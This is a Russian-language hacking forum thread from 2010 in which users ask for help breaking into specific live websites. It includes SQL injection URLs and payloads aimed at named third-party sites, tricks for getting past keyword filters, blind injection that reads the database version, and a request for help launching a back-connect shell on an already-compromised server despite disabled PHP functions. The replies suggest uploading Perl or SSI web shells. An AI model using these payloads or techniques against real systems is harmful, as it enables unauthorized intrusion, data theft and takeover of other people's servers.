ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
10.03.2010, 04:37
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
есть такая хрень... ну мб и не совсем так. Просто в результате некоторых "неверных" действий, сайт подвисает на некоторое время(я замечал такое когда name_const используешь при задании limit с номером несуществующей записи). Но он подвисает не сам, а только у клиента. Это довольно странно, я писал об этом, но тему удалили=) Ну я использую tor, то он меня не банит) а если там что-то типа такого кода
PHP код:
$id=$_GET['id'];
$id=lowercase($id);//точно не помню как она в пхп звучит, по этаму написал как в delphi
if (strstr('from',$id)>0) showerror;
как такое обойти? |
|
|
10.03.2010, 08:09
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
карочи я вообще задолбался раскрутит эту скул:
http://www.bourdela.tv/index.php?topic=2'
никак не могу обходит фильтр кавычки, всё перепробовал
SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/index.php?topic=2'' AND cookie_info=''' at line 1]
SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1')' at line 1]
может кто посоветует обход |
|
|
|
10.03.2010, 09:44
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от Seravin
есть такая хрень... ну мб и не совсем так. Просто в результате некоторых "неверных" действий, сайт подвисает на некоторое время(я замечал такое когда name_const используешь при задании limit с номером несуществующей записи). Но он подвисает не сам, а только у клиента. Это довольно странно, я писал об этом, но тему удалили=) Ну я использую tor, то он меня не банит) а если там что-то типа такого кода
PHP код:
$id=$_GET['id'];
$id=lowercase($id);//точно не помню как она в пхп звучит, по этаму написал как в delphi
if (strstr('from',$id)>0) showerror;
как такое обойти? PHP  ))
id=123456768+union+select+1+--+
12345678 больше нуля, и проходит дальше, PHP сравнивает только первое вхождение.
|
|
|
|
10.03.2010, 09:55
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Как выполнить комманду,если
Код:
disable_functions system,exec,passthru,shell_exec,posix_getpwuid,cmd,escapeshellcmd,popen,proc_open,ini_restore,dbmopen,suexec,show_source,escapeshellarg,set_time_limit,set_memory_limit
php 5.2.5
Последний раз редактировалось .:[melkiy]:.; 10.03.2010 в 12:07..
|
|
|
|
10.03.2010, 10:18
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973
Репутация:
466
|
|
2.:[melkiy]:.
а может попробуешь загрузить перловый или SSI шелл!
SSI шелл дето здесь на ачате лежит!
|
|
|
|
10.03.2010, 12:02
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Сообщение от Ctacok
PHP ))
id=123456768+union+select+1+--+
12345678 больше нуля, и проходит дальше, PHP сравнивает только первое вхождение. Что-то ты какую-то хрень непонятную написал)
У меня ищет вхождения подстроки 'from' и 'union', проичём тут 12345678?
|
|
|
|
10.03.2010, 12:07
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Сообщение от Rubaka
2.:[melkiy]:.
а может попробуешь загрузить перловый или SSI шелл!
SSI шелл дето здесь на ачате лежит!
Пробывал
Сообщение от Strilo4ka
ну зато есть fopen fgets и тому подобное мб ценное мб в файлах...
У меня и так есть доступ к файлам. Нужно просто запустить бэк-коннект, чтобы порутать.Но комманды не пашут ибо:
Код:
disable_functions system,exec,passthru,shell_exec,posix_getpwuid,cmd,escapeshellcmd,popen,proc_open,ini_restore,dbmopen,suexec,show_source,escapeshellarg,set_time_limit,set_memory_limit
Причем тут fopen и тп? Оо
safe mode Off
|
|
|
|
10.03.2010, 12:43
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от Seravin
Что-то ты какую-то хрень непонятную написал)
У меня ищет вхождения подстроки 'from' и 'union', проичём тут 12345678?
Не о том подумал =\
Я думал про фильтрацию числе.
Ну если на union, можно как слепую.
|
|
|
|
10.03.2010, 12:49
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Сообщение от Ctacok
Не о том подумал =\
Я думал про фильтрацию числе.
Ну если на union, можно как слепую.
ну это понятно, но тут второй косяк: фильтрация на from ещё...
|
|
|
|
10.03.2010, 13:07
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
оказывается там не фильтрация... что-то очень хитрое, чего я догнать не могу
такой запрос проходит
Код:
http://www.gtbit.org/news/viewitem.php?id=37/*from*/+and+ascii(substring((select+version()),1,1))=53
значит всё-таки запрос обрабатывается
Я вот думаю, может это как-то сервер хитро настроен?
запрос:
Код:
http://www.gtbit.org/news/viewitem.php?id=37+and+1=2+union
проходит, а в связке с select выдаёт ошибку(с union+all+select тоже)
Код:
http://www.gtbit.org/news/viewitem.php?id=37+and+1=2+union+select
Получается не ищется вхождение подстроки 'union' и 'from'.
Также 'union' и 'from' не вырезается из строки, потому что
Код:
http://www.gtbit.org/news/viewitem.php?id=37+and+1=2+union
http://www.gtbit.org/news/viewitem.php?id=37+and+1=1+union
выдаёт ошибку мускуля
самое интересное то, что когда пишешь:
Код:
http://www.gtbit.org/news/viewitem.php?id=37+and+1=2+union+select
то он выдаёт ошибку
Код:
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, webmaster@gtbit.org and inform them of the time the error occurred, and anything you might have done that may have caused the error.
More information about this error may be available in the server error log.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
а при union без select
Код:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/gtbitor/public_html/news/viewitem.php on line 45
Почему такая реакция?
Последний раз редактировалось Seravin; 10.03.2010 в 15:48..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1968124){kind=avatar}
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1968285){kind=avatar}
Похожие темы
Линейный вид
